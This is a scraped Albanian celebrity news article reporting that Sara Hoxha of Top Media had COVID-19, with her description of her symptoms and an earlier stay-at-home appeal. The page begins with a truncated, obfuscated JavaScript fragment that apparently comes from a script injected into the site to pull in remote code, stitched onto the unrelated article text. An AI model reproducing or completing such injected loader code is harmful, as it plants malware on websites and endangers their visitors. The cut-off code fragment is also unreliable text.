;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Sara Hoxha pozitive në COVID-19

By

Një tjetër emër i njohur ka zbuluar se ka qenë ose është e prekur nga COVID-19.

Fjala është për trashëgimtaren e Top Medias, Sara Hoxha.

View this post on Instagram

last night✨

A post shared by Sara Hoxha (@sarahoxhaaa) on

Ajo, e pyetur nga ndjekësit se a është e sigurtë që të udhëtosh në pandemi, në InstaStory është përgjigjur:

“Duke qenë se virusin e mora në Dhërmi, me shumë gjasa është ok nëse mbrohesh në ambiente të mbyllura dhe aty ku mundesh mban distancë. Duhet të jetë në rregull. Nuk jam eksperte kështuqë bëj kërkimet tua dhe besoj instikit tënd” – është shprehur Hoxha.

Meqenëse postimet e saj në rrjet nuk janë shumë të shpeshta, nuk dihej fillimisht se për cilën periudhë po flet trashëgimtarja e Top Medias.

Në një postim të mëvonshëm Sara zbardhi edhe më shumë detaje.

Për këdo që po pyet në lidhje me përvojen time me virusin corona. Jam më mirë tani. E kam marrë mbi një muaj më parë. Në plazh me disa miq. E kam kuptuar që e kam menjëherë pasi kisha dhimbje të tmerrshme të trupit dhe ethe, simptoma ime kryesore, lodhja dhe dhimbja e çmendur e kokës që e bëri të pamundur të shoh dritën dhe zgjati 4-5 ditë. Flija 16-17 orë, gjë shumë e rallë për mua.

Në ditën 6-7 nuk mund të shijoja apo të nuhasja. Gjithçka u lehtësua pas ditës së 10. Ethet zgjatën vetëm dy ditë. Burri im dhe fëmijët nuk e morën dhe i kam lënë për dy javë. Simptomat janë të vështira (edhe pse jam shumë me fat). Por presioni psiqik i izolimit dhe frika e covid-19 të çmend. Nuk ndihem ende 100%. Do thoja që jam tek 60-ta. Ankthi është i vazhdueshëm, nuk flej mirë. Detyrat e mia të përditshme më lodhin tepër shpejt dhe flokët e mia vazhdojnë të bijnë. E dija që e kisha lehtas. Jam skajsmërisht mirënjohëse.

Në fillim të pandemisë, Sara bënte apel për kujdes maksimal duke ndarë me ndjekësit detaje personale nga familja për rrezikun që i kanoset personave me sëmundje shoqëruese.

‘Familja ime dhe unë jetojmë vetë, nuk kemi njerëz të moshuar; dy fëmijë dhe dy të rritur të shëndetshëm. Ime me nga ana tjetër, jeton me vëllain tim 12 vjeç. Ai vuan nga Diabeti Tipi 1. Duke dalë jashtë, ju po rrezikoni jetën e tij dhe mundësinë që ai të vihet në kontakt me këdo që mund ta ketë.

Qëndroni në shtëpi. Qëndroni në shtëpi për njerëzit që nuk munden. Për infermierët tanë, mjekët, shitësit e frutave, arkëtarët e supermarketeve, farmacistët dhe të gjithë të tjerët që po rrezikojnë jetën e tyre çdo ditë. Qëndroni në shtëpi dhe kujdesuni për ato më të dobëtit’ – shprehej Hoxha në muajin mars.

Urojmë ta ketë kaluar sa më lehtë! /Prive.al

Artikuj të ngjashëm